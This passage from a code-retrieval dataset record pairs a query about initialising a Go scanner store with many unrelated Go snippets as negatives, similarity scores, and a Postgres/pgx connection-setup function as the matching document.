provider.ResourceType_RESOURCE_TYPE_FILE\n\tcase fi.Mode()&os.ModeSymlink != 0:\n\t\tnodeType = provider.ResourceType_RESOURCE_TYPE_SYMLINK\n\t\t// TODO reference using ext attr on a symlink\n\t\t// nodeType = provider.ResourceType_RESOURCE_TYPE_REFERENCE\n\t}\n\n\tid := &provider.ResourceId{OpaqueId: n.ID}\n\n\tif returnBasename {\n\t\tfn = n.Name\n\t} else {\n\t\tfn, err = n.lu.Path(ctx, n)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t}\n\n\tri = &provider.ResourceInfo{\n\t\tId: id,\n\t\tPath: fn,\n\t\tType: nodeType,\n\t\tMimeType: mime.Detect(nodeType == provider.ResourceType_RESOURCE_TYPE_CONTAINER, fn),\n\t\tSize: uint64(n.Blobsize),\n\t\tTarget: string(target),\n\t\tPermissionSet: rp,\n\t}\n\n\tif nodeType == provider.ResourceType_RESOURCE_TYPE_CONTAINER {\n\t\tts, err := n.GetTreeSize()\n\t\tif err == nil {\n\t\t\tri.Size = ts\n\t\t} else {\n\t\t\tri.Size = 0 // make dirs always return 0 if it is unknown\n\t\t\tsublog.Debug().Err(err).Msg(\"could not read treesize\")\n\t\t}\n\t}\n\n\tif ri.Owner, err = n.Owner(); err != nil {\n\t\tsublog.Debug().Err(err).Msg(\"could not determine owner\")\n\t}\n\n\t// TODO make etag of files use fileid and checksum\n\n\tvar tmTime time.Time\n\tif tmTime, err = n.GetTMTime(); err != nil {\n\t\t// no tmtime, use mtime\n\t\ttmTime = fi.ModTime()\n\t}\n\n\t// use temporary etag if it is set\n\tif b, err := xattr.Get(nodePath, xattrs.TmpEtagAttr); err == nil {\n\t\tri.Etag = fmt.Sprintf(`\"%x\"`, string(b)) // TODO why do we convert string(b)? is the temporary etag stored as string? -> should we use bytes? use hex.EncodeToString?\n\t} else if ri.Etag, err = calculateEtag(n.ID, tmTime); err != nil {\n\t\tsublog.Debug().Err(err).Msg(\"could not calculate etag\")\n\t}\n\n\t// mtime uses tmtime if present\n\t// TODO expose mtime and tmtime separately?\n\tun := tmTime.UnixNano()\n\tri.Mtime = &types.Timestamp{\n\t\tSeconds: uint64(un / 1000000000),\n\t\tNanos: uint32(un % 1000000000),\n\t}\n\n\tmdKeysMap := make(map[string]struct{})\n\tfor _, k := range mdKeys {\n\t\tmdKeysMap[k] = struct{}{}\n\t}\n\n\tvar returnAllKeys bool\n\tif _, ok := mdKeysMap[\"*\"]; len(mdKeys) == 0 || ok {\n\t\treturnAllKeys = true\n\t}\n\n\tmetadata := map[string]string{}\n\n\t// read favorite flag for the current user\n\tif _, ok := mdKeysMap[FavoriteKey]; returnAllKeys || ok {\n\t\tfavorite := \"\"\n\t\tif u, ok := ctxpkg.ContextGetUser(ctx); ok {\n\t\t\t// the favorite flag is specific to the user, so we need to incorporate the userid\n\t\t\tif uid := u.GetId(); uid != nil {\n\t\t\t\tfa := fmt.Sprintf(\"%s:%s:%s@%s\", xattrs.FavPrefix, utils.UserTypeToString(uid.GetType()), uid.GetOpaqueId(), uid.GetIdp())\n\t\t\t\tif val, err := xattr.Get(nodePath, fa); err == nil {\n\t\t\t\t\tsublog.Debug().\n\t\t\t\t\t\tStr(\"favorite\", fa).\n\t\t\t\t\t\tMsg(\"found favorite flag\")\n\t\t\t\t\tfavorite = string(val)\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tsublog.Error().Err(errtypes.UserRequired(\"userrequired\")).Msg(\"user has no id\")\n\t\t\t}\n\t\t} else {\n\t\t\tsublog.Error().Err(errtypes.UserRequired(\"userrequired\")).Msg(\"error getting user from ctx\")\n\t\t}\n\t\tmetadata[FavoriteKey] = favorite\n\t}\n\n\t// share indicator\n\tif _, ok := mdKeysMap[ShareTypesKey]; returnAllKeys || ok {\n\t\tif n.hasUserShares(ctx) {\n\t\t\tmetadata[ShareTypesKey] = UserShareType\n\t\t}\n\t}\n\n\t// checksums\n\tif _, ok := mdKeysMap[ChecksumsKey]; (nodeType == provider.ResourceType_RESOURCE_TYPE_FILE) && returnAllKeys || ok {\n\t\t// TODO which checksum was requested? sha1 adler32 or md5? for now hardcode sha1?\n\t\treadChecksumIntoResourceChecksum(ctx, nodePath, storageprovider.XSSHA1, ri)\n\t\treadChecksumIntoOpaque(ctx, nodePath, storageprovider.XSMD5, ri)\n\t\treadChecksumIntoOpaque(ctx, nodePath, storageprovider.XSAdler32, ri)\n\t}\n\t// quota\n\tif _, ok := mdKeysMap[QuotaKey]; (nodeType == provider.ResourceType_RESOURCE_TYPE_CONTAINER) && returnAllKeys || ok {\n\t\tvar quotaPath string\n\t\tif n.SpaceRoot == nil {\n\t\t\troot, err := n.lu.HomeOrRootNode(ctx)\n\t\t\tif err == nil {\n\t\t\t\tquotaPath = root.InternalPath()\n\t\t\t} else {\n\t\t\t\tsublog.Debug().Err(err).Msg(\"error determining the space root node for quota\")\n\t\t\t}\n\t\t} else {\n\t\t\tquotaPath = n.SpaceRoot.InternalPath()\n\t\t}\n\t\tif quotaPath != \"\" {\n\t\t\treadQuotaIntoOpaque(ctx, quotaPath, ri)\n\t\t}\n\t}\n\n\t// only read the requested metadata attributes\n\tattrs, err := xattr.List(nodePath)\n\tif err != nil {\n\t\tsublog.Error().Err(err).Msg(\"error getting list of extended attributes\")\n\t} else {\n\t\tfor i := range attrs {\n\t\t\t// filter out non-custom properties\n\t\t\tif !strings.HasPrefix(attrs[i], xattrs.MetadataPrefix) {\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\t// only read when key was requested\n\t\t\tk := attrs[i][len(xattrs.MetadataPrefix):]\n\t\t\tif _, ok := mdKeysMap[k]; returnAllKeys || ok {\n\t\t\t\tif val, err := xattr.Get(nodePath, attrs[i]); err == nil {\n\t\t\t\t\tmetadata[k] = string(val)\n\t\t\t\t} else {\n\t\t\t\t\tsublog.Error().Err(err).\n\t\t\t\t\t\tStr(\"entry\", attrs[i]).\n\t\t\t\t\t\tMsg(\"error retrieving xattr metadata\")\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\tri.ArbitraryMetadata = &provider.ArbitraryMetadata{\n\t\tMetadata: metadata,\n\t}\n\n\tsublog.Debug().\n\t\tInterface(\"ri\", ri).\n\t\tMsg(\"AsResourceInfo\")\n\n\treturn ri, nil\n}", "func (*ListSettingsResponse) Descriptor() ([]byte, []int) {\n\treturn file_google_cloud_resourcesettings_v1_resource_settings_proto_rawDescGZIP(), []int{4}\n}", "func FormatUser(u *discordgo.User) string {\n\treturn fmt.Sprintf(\"<@%s>\", u.ID)\n}", "func (*Identifier) Descriptor() ([]byte, []int) {\n\treturn file_ocis_messages_settings_v0_settings_proto_rawDescGZIP(), []int{1}\n}", "func (*WatchUserResponse) Descriptor() ([]byte, []int) {\n\treturn edgelq_iam_proto_v1alpha_user_service_proto_rawDescGZIP(), []int{6}\n}", "func (*GetUserRoleOnProjectResponse) Descriptor() ([]byte, []int) {\n\treturn file_user_proto_rawDescGZIP(), []int{31}\n}", "func (o GrafanaAzureMonitorWorkspaceIntegrationOutput) ResourceId() pulumi.StringOutput {\n\treturn o.ApplyT(func(v GrafanaAzureMonitorWorkspaceIntegration) string { return v.ResourceId }).(pulumi.StringOutput)\n}", "func (o *SamlConfigurationProperties) GetNameIdFormat() SamlConfigurationPropertyItemsString {\n\tif o == nil || o.NameIdFormat == nil {\n\t\tvar ret SamlConfigurationPropertyItemsString\n\t\treturn ret\n\t}\n\treturn *o.NameIdFormat\n}", "func (*UserUUID) Descriptor() ([]byte, []int) {\n\treturn file_user_proto_rawDescGZIP(), []int{2}\n}", "func (n *Node) AsResourceInfo(ctx context.Context, rp *provider.ResourcePermissions, mdKeys, fieldMask []string, returnBasename bool) (ri *provider.ResourceInfo, err error) {\n\tsublog := appctx.GetLogger(ctx).With().Interface(\"node\", n.ID).Logger()\n\n\tvar fn string\n\tnodeType := n.Type(ctx)\n\n\tvar target string\n\tif nodeType == provider.ResourceType_RESOURCE_TYPE_REFERENCE {\n\t\ttarget, _ = n.XattrString(ctx, prefixes.ReferenceAttr)\n\t}\n\n\tid := &provider.ResourceId{SpaceId: n.SpaceID, OpaqueId: n.ID}\n\n\tswitch {\n\tcase n.IsSpaceRoot(ctx):\n\t\tfn = \".\" // space roots do not have a path as they are referencing themselves\n\tcase returnBasename:\n\t\tfn = n.Name\n\tdefault:\n\t\tfn, err = n.lu.Path(ctx, n, NoCheck)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t}\n\n\tri = &provider.ResourceInfo{\n\t\tId: id,\n\t\tPath: fn,\n\t\tType: nodeType,\n\t\tMimeType: mime.Detect(nodeType == provider.ResourceType_RESOURCE_TYPE_CONTAINER, fn),\n\t\tSize: uint64(n.Blobsize),\n\t\tTarget: target,\n\t\tPermissionSet: rp,\n\t\tOwner: n.Owner(),\n\t\tParentId: &provider.ResourceId{\n\t\t\tSpaceId: n.SpaceID,\n\t\t\tOpaqueId: n.ParentID,\n\t\t},\n\t\tName: n.Name,\n\t}\n\n\tif n.IsProcessing(ctx) {\n\t\tri.Opaque = utils.AppendPlainToOpaque(ri.Opaque, \"status\", \"processing\")\n\t}\n\n\tif nodeType == provider.ResourceType_RESOURCE_TYPE_CONTAINER {\n\t\tts, err := n.GetTreeSize(ctx)\n\t\tif err == nil {\n\t\t\tri.Size = ts\n\t\t} else {\n\t\t\tri.Size = 0 // make dirs always return 0 if it is unknown\n\t\t\tsublog.Debug().Err(err).Msg(\"could not read treesize\")\n\t\t}\n\t}\n\n\t// TODO make etag of files use fileid and checksum\n\n\tvar tmTime time.Time\n\tif tmTime, err = n.GetTMTime(ctx); err != nil {\n\t\tsublog.Debug().Err(err).Msg(\"could not get tmtime\")\n\t}\n\n\t// use temporary etag if it is set\n\tif b, err := n.XattrString(ctx, prefixes.TmpEtagAttr); err == nil && b != \"\" {\n\t\tri.Etag = fmt.Sprintf(`\"%x\"`, b)\n\t} else if ri.Etag, err = calculateEtag(n, tmTime); err != nil {\n\t\tsublog.Debug().Err(err).Msg(\"could not calculate etag\")\n\t}\n\n\t// mtime uses tmtime if present\n\t// TODO expose mtime and tmtime separately?\n\tun := tmTime.UnixNano()\n\tri.Mtime = &types.Timestamp{\n\t\tSeconds: uint64(un / 1000000000),\n\t\tNanos: uint32(un % 1000000000),\n\t}\n\n\tmdKeysMap := make(map[string]struct{})\n\tfor _, k := range mdKeys {\n\t\tmdKeysMap[k] = struct{}{}\n\t}\n\n\tvar returnAllMetadata bool\n\tif _, ok := mdKeysMap[\"*\"]; len(mdKeys) == 0 || ok {\n\t\treturnAllMetadata = true\n\t}\n\n\tmetadata := map[string]string{}\n\n\tfieldMaskKeysMap := make(map[string]struct{})\n\tfor _, k := range fieldMask {\n\t\tfieldMaskKeysMap[k] = struct{}{}\n\t}\n\n\tvar returnAllFields bool\n\tif _, ok := fieldMaskKeysMap[\"*\"]; len(fieldMask) == 0 || ok {\n\t\treturnAllFields = true\n\t}\n\n\t// read favorite flag for the current user\n\tif _, ok := mdKeysMap[FavoriteKey]; returnAllMetadata || ok {\n\t\tfavorite := \"\"\n\t\tif u, ok := ctxpkg.ContextGetUser(ctx); ok {\n\t\t\t// the favorite flag is specific to the user, so we need to incorporate the userid\n\t\t\tif uid := u.GetId(); uid != nil {\n\t\t\t\tfa := fmt.Sprintf(\"%s:%s:%s@%s\", prefixes.FavPrefix, utils.UserTypeToString(uid.GetType()), uid.GetOpaqueId(), uid.GetIdp())\n\t\t\t\tif val, err := n.XattrString(ctx, fa); err == nil {\n\t\t\t\t\tsublog.Debug().\n\t\t\t\t\t\tStr(\"favorite\", fa).\n\t\t\t\t\t\tMsg(\"found favorite flag\")\n\t\t\t\t\tfavorite = val\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tsublog.Error().Err(errtypes.UserRequired(\"userrequired\")).Msg(\"user has no id\")\n\t\t\t}\n\t\t} else {\n\t\t\tsublog.Error().Err(errtypes.UserRequired(\"userrequired\")).Msg(\"error getting user from ctx\")\n\t\t}\n\t\tmetadata[FavoriteKey] = favorite\n\t}\n\t// read locks\n\t// FIXME move to fieldmask\n\tif _, ok := mdKeysMap[LockdiscoveryKey]; returnAllMetadata || ok {\n\t\tif n.hasLocks(ctx) {\n\t\t\terr = readLocksIntoOpaque(ctx, n, ri)\n\t\t\tif err != nil {\n\t\t\t\tsublog.Debug().Err(errtypes.InternalError(\"lockfail\"))\n\t\t\t}\n\t\t}\n\t}\n\n\t// share indicator\n\tif _, ok := fieldMaskKeysMap[\"share-types\"]; returnAllFields || ok {\n\t\tgranteeTypes := n.getGranteeTypes(ctx)\n\t\tif len(granteeTypes) > 0 {\n\t\t\t// TODO add optional property to CS3 ResourceInfo to transport grants?\n\t\t\tvar s strings.Builder\n\t\t\tfirst := true\n\t\t\tfor _, t := range granteeTypes {\n\t\t\t\tif !first {\n\t\t\t\t\ts.WriteString(\",\")\n\t\t\t\t} else {\n\t\t\t\t\tfirst = false\n\t\t\t\t}\n\t\t\t\ts.WriteString(strconv.Itoa(int(t)))\n\t\t\t}\n\t\t\tri.Opaque = utils.AppendPlainToOpaque(ri.Opaque, \"share-types\", s.String())\n\t\t}\n\t}\n\n\t// checksums\n\t// FIXME move to fieldmask\n\tif _, ok := mdKeysMap[ChecksumsKey]; (nodeType == provider.ResourceType_RESOURCE_TYPE_FILE) && (returnAllMetadata || ok) {\n\t\t// TODO which checksum was requested? sha1 adler32 or md5? for now hardcode sha1?\n\t\t// TODO make ResourceInfo carry multiple checksums\n\t\tn.readChecksumIntoResourceChecksum(ctx, storageprovider.XSSHA1, ri)\n\t\tn.readChecksumIntoOpaque(ctx, storageprovider.XSMD5, ri)\n\t\tn.readChecksumIntoOpaque(ctx, storageprovider.XSAdler32, ri)\n\t}\n\t// quota\n\t// FIXME move to fieldmask\n\tif _, ok := mdKeysMap[QuotaKey]; (nodeType == provider.ResourceType_RESOURCE_TYPE_CONTAINER) && returnAllMetadata || ok {\n\t\tif n.SpaceRoot != nil && n.SpaceRoot.InternalPath() != \"\" {\n\t\t\tn.SpaceRoot.readQuotaIntoOpaque(ctx, ri)\n\t\t}\n\t}\n\n\t// only read the requested metadata attributes\n\tattrs, err := n.Xattrs(ctx)\n\tif err != nil {\n\t\tsublog.Error().Err(err).Msg(\"error getting list of extended attributes\")\n\t} else {\n\t\tfor key, value := range attrs {\n\t\t\t// filter out non-custom properties\n\t\t\tif !strings.HasPrefix(key, prefixes.MetadataPrefix) {\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\t// only read when key was requested\n\t\t\tk := key[len(prefixes.MetadataPrefix):]\n\t\t\tif _, ok := mdKeysMap[k]; returnAllMetadata || ok {\n\t\t\t\tmetadata[k] = string(value)\n\t\t\t}\n\n\t\t}\n\t}\n\tri.ArbitraryMetadata = &provider.ArbitraryMetadata{\n\t\tMetadata: metadata,\n\t}\n\n\t// add virusscan information\n\tif scanned, _, date := n.ScanData(ctx); scanned {\n\t\tri.Opaque = utils.AppendPlainToOpaque(ri.Opaque, \"scantime\", date.Format(time.RFC3339Nano))\n\t}\n\n\tsublog.Debug().\n\t\tInterface(\"ri\", ri).\n\t\tMsg(\"AsResourceInfo\")\n\n\treturn ri, nil\n}", "func (*NewUserRelationships_Roles) Descriptor() ([]byte, []int) {\n\treturn file_protodef_user_user_proto_rawDescGZIP(), []int{7, 0}\n}", "func (_ Port) OpenAPISchemaFormat() string { return \"int-or-string\" }", "func Format(uuid UUID, style Style) string {\n\tif len(uuid) != 16 {\n\t\tpanic(\"uuid: UUID is invalid\")\n\t}\n\n\tbuffer := []byte(uuid)\n\tswitch style {\n\tcase StyleStandard:\n\t\treturn fmt.Sprintf(\"%08x-%04x-%04x-%04x-%012x\", buffer[:4], buffer[4:6], buffer[6:8], buffer[8:10], buffer[10:])\n\tcase StyleWithoutDash:\n\t\treturn fmt.Sprintf(\"%x\", buffer[:])\n\tdefault:\n\t\tpanic(\"uuid: style of UUID is invalid\")\n\t}\n}", "func (*User) Descriptor() ([]byte, []int) {\n\treturn file_usermanage_usermanage_proto_rawDescGZIP(), []int{1}\n}", "func (*UserListByIdsReq) Descriptor() ([]byte, []int) {\n\treturn file_proto_user_proto_rawDescGZIP(), []int{11}\n}", "func (o LookupPermissionsResultOutput) Id() pulumi.StringOutput {\n\treturn o.ApplyT(func(v LookupPermissionsResult) string { return v.Id }).(pulumi.StringOutput)\n}", "func (*SetUserMetaDataResponse) Descriptor() ([]byte, []int) {\n\treturn file_IOService_proto_rawDescGZIP(), []int{25}\n}", "func (s *Service) GetSettings(userID string) *GetSettingsOp {\n\treturn &GetSettingsOp{\n\t\tCredential: s.credential,\n\t\tMethod: \"GET\",\n\t\tPath: strings.Join([]string{\"users\", userID, \"settings\"}, \"/\"),\n\t\tAccept: \"application/json\",\n\t\tQueryOpts: make(url.Values),\n\t\tVersion: esign.APIv21,\n\t}\n}", "func (*ReadTensorboardUsageResponse_PerUserUsageData) Descriptor() ([]byte, []int) {\n\treturn file_google_cloud_aiplatform_v1_tensorboard_service_proto_rawDescGZIP(), []int{7, 0}\n}", "func (o *ShortenerAPI) Formats() strfmt.Registry {\n\treturn o.formats\n}", "func (s *InfoService) Formats(ctx context.Context) (formats *Formats, resp *http.Response, err error) {\n\tu := \"/api/v1/infos/formats\"\n\treq, err := s.client.NewRequest(\"GET\", u, \"\")\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\n\tresp, err = s.client.Do(ctx, req, &formats)\n\tif err != nil {\n\t\treturn nil, resp, err\n\t}\n\treturn formats, resp, nil\n}", "func (*AssociatePrimaryUserResponse) Descriptor() ([]byte, []int) {\n\treturn file_token_proto_rawDescGZIP(), []int{5}\n}", "func (*SharedTribeUserInterestsResponse) Descriptor() ([]byte, []int) {\n\treturn file_api_protobuf_spec_connection_resource_v1_proto_rawDescGZIP(), []int{14}\n}", "func (ComputedUserset_Object) EnumDescriptor() ([]byte, []int) {\n\treturn file_authzed_api_v0_namespace_proto_rawDescGZIP(), []int{7, 0}\n}", "func (*ReadStorageObjectId) Descriptor() ([]byte, []int) {\n\treturn file_api_proto_rawDescGZIP(), []int{76}\n}", "func (IdpStylingType) EnumDescriptor() ([]byte, []int) {\n\treturn file_management_proto_rawDescGZIP(), []int{33}\n}", "func (o GetUsersResultOutput) Id() pulumi.StringOutput {\n\treturn o.ApplyT(func(v GetUsersResult) string { return v.Id }).(pulumi.StringOutput)\n}", "func getUsersLangSettings(userIds []uuid.UUID, userInfoInReq *UserInfoInReq) (map[string]string, error) {\n\turl := \"/setting/dto/ids\"\n\tmodel := models.GetSettingsModel{\n\t\tUserIds: userIds,\n\t\tType: \"lang\",\n\t}\n\tpayload, marshalErr := json.Marshal(model)\n\tif marshalErr != nil {\n\t\treturn nil, marshalErr\n\t}\n\n\tresData, callErr := functionCall(http.MethodPost, payload, url, getHeadersFromUserInfoReq(userInfoInReq))\n\tif callErr != nil {\n\n\t\treturn nil, fmt.Errorf(\"Cannot send request to %s - %s\", url, callErr.Error())\n\t}\n\n\tvar parsedData map[string]string\n\tjson.Unmarshal(resData, &parsedData)\n\treturn parsedData, nil\n}", "func (*Role) Descriptor() ([]byte, []int) {\n\treturn file_proto_fandncloud_service_user_user_proto_rawDescGZIP(), []int{4}\n}", "func (o TableResourceOutput) Id() pulumi.StringOutput {\n\treturn o.ApplyT(func(v TableResource) string { return v.Id }).(pulumi.StringOutput)\n}", "func (*RegistrationListByUserRes) Descriptor() ([]byte, []int) {\n\treturn file_registration_proto_rawDescGZIP(), []int{22}\n}" ]
[ "0.48658967", "0.4843349", "0.47780105", "0.4751632", "0.4737584", "0.4706194", "0.46835887", "0.46823364", "0.46605846", "0.46132356", "0.46063283", "0.4602935", "0.45769018", "0.45747116", "0.45594412", "0.4555575", "0.45465", "0.45461395", "0.45461395", "0.4528009", "0.44738445", "0.44672647", "0.4463211", "0.44621274", "0.4456235", "0.44453076", "0.44433528", "0.44355974", "0.4418911", "0.44147786", "0.44121838", "0.44029102", "0.4389197", "0.4386519", "0.43795985", "0.43670374", "0.43436006", "0.43413955", "0.43410802", "0.433423", "0.43341303", "0.43170506", "0.43140906", "0.43118897", "0.43093625", "0.43093434", "0.43090412", "0.43082166", "0.43082166", "0.43049192", "0.42963496", "0.42959362", "0.42934412", "0.42819458", "0.42754933", "0.4271525", "0.42669028", "0.42656955", "0.425596", "0.4255724", "0.42529073", "0.42515063", "0.42506874", "0.42492878", "0.4245376", "0.42442632", "0.42406362", "0.42394388", "0.42361227", "0.42315307", "0.42306405", "0.4226484", "0.42159265", "0.42135885", "0.42132106", "0.42111105", "0.42058432", "0.42051482", "0.42001694", "0.41977784", "0.4197568", "0.41940752", "0.41896087", "0.41886687", "0.41819343", "0.4180713", "0.41777694", "0.41742346", "0.41736457", "0.41735458", "0.41685864", "0.4168473", "0.4166294", "0.41624063", "0.4161911", "0.41604826", "0.41536215", "0.41501346", "0.41499034", "0.41471186" ]
0.46983594
6
initialize a scanner.Store given libscan.Opts
func initStore(ctx context.Context, opts *Opts) (*sqlx.DB, scanner.Store, error) { var store scanner.Store switch opts.DataStore { case Postgres: // we are going to use pgx for more control over connection pool and // and a cleaner api around bulk inserts cfg, err := pgxpool.ParseConfig(opts.ConnString) if err != nil { return nil, nil, fmt.Errorf("failed to parse ConnString: %v", err) } cfg.MaxConns = 30 pool, err := pgxpool.ConnectConfig(ctx, cfg) if err != nil { return nil, nil, fmt.Errorf("failed to create ConnPool: %v", err) } // setup sqlx db, err := sqlx.Open("pgx", opts.ConnString) if err != nil { return nil, nil, fmt.Errorf("failed to open db: %v", err) } store = postgres.NewStore(db, pool) return db, store, nil default: return nil, nil, fmt.Errorf("provided unknown DataStore") } }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func InitStore(s Store) {\n\tstore = s\n}", "func InitStore(s Store) {\n\tstore = s\n}", "func InitStore(s Store) {\n\tstore = s\n}", "func New(opts ...Option) (*Store, error) {\n\tvar s Store\n\n\tfor _, opt := range opts {\n\t\tif err := opt.Apply(&s); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t}\n\n\treturn &s, nil\n}", "func InitStore(s StoreInterface) {\n\tDocsStore = s\n}", "func (s *Store) Init(option Option) error {\n\treturn option.ApplyTo(s)\n}", "func (scanner *Scanner) Init(flags zgrab2.ScanFlags) error {\n\tf, _ := flags.(*Flags)\n\tscanner.config = f\n\treturn nil\n}", "func New(opt StoreOptions) *Store {\n\tstore := &Store{}\n\n\tfmt.Println(opt.toString())\n\tsession, err := mgo.Dial(opt.toString())\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\tstore.cli = session\n\tstore.database = opt.Database\n\treturn store\n}", "func NewStore(dir string, hints map[string]string) *Store {\n\tif hints == nil {\n\t\thints = map[string]string{}\n\t}\n\treturn &Store{\n\t\tData: &sync.Map{},\n\t\tDir: dir,\n\t\tHints: hints,\n\t\tListFiles: listFiles,\n\t\tParseFile: parseFile,\n\t\tFileExists: fileExists,\n\t}\n}", "func Init(ctx context.Context, alias, path string) (*Store, error) {\n\tdebug.Log(\"Initializing %s at %s\", alias, path)\n\n\ts := &Store{\n\t\talias: alias,\n\t\tpath: path,\n\t}\n\n\tst, err := backend.InitStorage(ctx, backend.GetStorageBackend(ctx), path)\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"failed to initialize storage for %s at %s: %w\", alias, path, err)\n\t}\n\n\ts.storage = st\n\tdebug.Log(\"Storage for %s => %s initialized as %s\", alias, path, st.Name())\n\n\tcrypto, err := backend.NewCrypto(ctx, backend.GetCryptoBackend(ctx))\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"failed to initialize crypto for %s at %s: %w\", alias, path, err)\n\t}\n\n\ts.crypto = crypto\n\tdebug.Log(\"Crypto for %q => %q initialized as %s\", alias, path, crypto.Name())\n\n\treturn s, nil\n}", "func InitStore() *Store {\n\tself := &Store{\n\t\tItems: make(map[string][][]byte),\n\t\tMarked: make(map[string]int64),\n\t}\n\tgo self.runGC(GC_RATE)\n\treturn self\n}", "func New(client Client, opt ...Option) *Scanner {\n\ts := Scanner{\n\t\tclient: client,\n\t\toptions: defaultOptions,\n\t}\n\tfor _, o := range opt {\n\t\to(&s.options)\n\t}\n\treturn &s\n}", "func NewScanner(opts ...option) *Scanner {\n\to := &options{\n\t\tclock: clock.RealClock{},\n\t}\n\n\tfor _, opt := range opts {\n\t\topt(o)\n\t}\n\treturn &Scanner{\n\t\tvs: photon.NewVulnSrc(),\n\t\toptions: o,\n\t}\n}", "func New(options Options) *Store {\n\t// Set default options\n\tif options.Codec == nil {\n\t\toptions.Codec = DefaultOptions.Codec\n\t}\n\n\ts := Store{\n\t\tm: make(map[string]*Item),\n\t\tlock: new(sync.RWMutex),\n\t\tcodec: options.Codec,\n\t}\n\n\tgo s.autoGC(options.Interval)\n\n\treturn &s\n}", "func (b *BadgerStore) init(dir string) error {\n\n\topts := badger.DefaultOptions(dir)\n\tif dir == \"\" {\n\t\topts = opts.WithInMemory(true)\n\t}\n\topts.Logger = &common.NoopLogger{}\n\tdb, err := badger.Open(opts)\n\tif err != nil {\n\t\treturn errors.Wrap(err, \"failed to open database\")\n\t}\n\n\t// Set the database\n\tb.db = db\n\n\t// Initialize the default transaction that auto commits\n\t// on success ops or discards on failure.\n\t// It also enables the renewal of the underlying transaction\n\t// after executing a read/write operation\n\tb.Tx = NewTx(db, true, true)\n\n\treturn nil\n}", "func New(options ...Option) *Scanner {\n\ts := &Scanner{\n\t\tignoreCheckErrors: true,\n\t}\n\tfor _, option := range options {\n\t\toption(s)\n\t}\n\treturn s\n}", "func NewStore(ts service.Service, opts ...Option) (*Store, error) {\n\tconfig := &Config{}\n\tfor _, opt := range opts {\n\t\tif err := opt(config); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t}\n\treturn newStore(ts, config)\n}", "func New(cfg *config.Config, ssmSvc ssmiface.SSMAPI) *Store {\n\treturn &Store{\n\t\tssmSvc: ssmSvc,\n\t\tcfg: cfg,\n\t}\n}", "func (s *Store) Start(ctx context.Context, stopper *stop.Stopper) error {\n\ts.stopper = stopper\n\n\t// Populate the store ident. If not bootstrapped, ReadStoreIntent will\n\t// return an error.\n\tident, err := ReadStoreIdent(ctx, s.engine)\n\tif err != nil {\n\t\treturn err\n\t}\n\ts.Ident = &ident\n\n\t// Set the store ID for logging.\n\ts.cfg.AmbientCtx.AddLogTag(\"s\", s.StoreID())\n\tctx = s.AnnotateCtx(ctx)\n\tlog.Event(ctx, \"read store identity\")\n\n\t// Add the store ID to the scanner's AmbientContext before starting it, since\n\t// the AmbientContext provided during construction did not include it.\n\t// Note that this is just a hacky way of getting around that without\n\t// refactoring the scanner/queue construction/start logic more broadly, and\n\t// depends on the scanner not having added its own log tag.\n\tif s.scanner != nil {\n\t\ts.scanner.AmbientContext.AddLogTag(\"s\", s.StoreID())\n\t}\n\n\t// If the nodeID is 0, it has not be assigned yet.\n\tif s.nodeDesc.NodeID != 0 && s.Ident.NodeID != s.nodeDesc.NodeID {\n\t\treturn errors.Errorf(\"node id:%d does not equal the one in node descriptor:%d\", s.Ident.NodeID, s.nodeDesc.NodeID)\n\t}\n\t// Always set gossip NodeID before gossiping any info.\n\tif s.cfg.Gossip != nil {\n\t\ts.cfg.Gossip.NodeID.Set(ctx, s.Ident.NodeID)\n\t}\n\n\t// Create ID allocators.\n\tidAlloc, err := idalloc.NewAllocator(idalloc.Options{\n\t\tAmbientCtx: s.cfg.AmbientCtx,\n\t\tKey: keys.RangeIDGenerator,\n\t\tIncrementer: idalloc.DBIncrementer(s.db),\n\t\tBlockSize: rangeIDAllocCount,\n\t\tStopper: s.stopper,\n\t})\n\tif err != nil {\n\t\treturn err\n\t}\n\n\t// Create the intent resolver.\n\tvar intentResolverRangeCache intentresolver.RangeCache\n\trngCache := s.cfg.RangeDescriptorCache\n\tif s.cfg.RangeDescriptorCache != nil {\n\t\tintentResolverRangeCache = rngCache\n\t}\n\n\ts.intentResolver = intentresolver.New(intentresolver.Config{\n\t\tClock: s.cfg.Clock,\n\t\tDB: s.db,\n\t\tStopper: stopper,\n\t\tTaskLimit: s.cfg.IntentResolverTaskLimit,\n\t\tAmbientCtx: s.cfg.AmbientCtx,\n\t\tTestingKnobs: s.cfg.TestingKnobs.IntentResolverKnobs,\n\t\tRangeDescriptorCache: intentResolverRangeCache,\n\t})\n\ts.metrics.registry.AddMetricStruct(s.intentResolver.Metrics)\n\n\t// Create the recovery manager.\n\ts.recoveryMgr = txnrecovery.NewManager(\n\t\ts.cfg.AmbientCtx, s.cfg.Clock, s.db, stopper,\n\t)\n\ts.metrics.registry.AddMetricStruct(s.recoveryMgr.Metrics())\n\n\ts.rangeIDAlloc = idAlloc\n\n\tnow := s.cfg.Clock.Now()\n\ts.startedAt = now.WallTime\n\n\t// Iterate over all range descriptors, ignoring uncommitted versions\n\t// (consistent=false). Uncommitted intents which have been abandoned\n\t// due to a split crashing halfway will simply be resolved on the\n\t// next split attempt. They can otherwise be ignored.\n\n\t// TODO(peter): While we have to iterate to find the replica descriptors\n\t// serially, we can perform the migrations and replica creation\n\t// concurrently. Note that while we can perform this initialization\n\t// concurrently, all of the initialization must be performed before we start\n\t// listening for Raft messages and starting the process Raft loop.\n\terr = IterateRangeDescriptors(ctx, s.engine,\n\t\tfunc(desc roachpb.RangeDescriptor) error {\n\t\t\tif !desc.IsInitialized() {\n\t\t\t\treturn errors.Errorf(\"found uninitialized RangeDescriptor: %+v\", desc)\n\t\t\t}\n\t\t\treplicaDesc, found := desc.GetReplicaDescriptor(s.StoreID())\n\t\t\tif !found {\n\t\t\t\t// This is a pre-emptive snapshot. It's also possible that this is 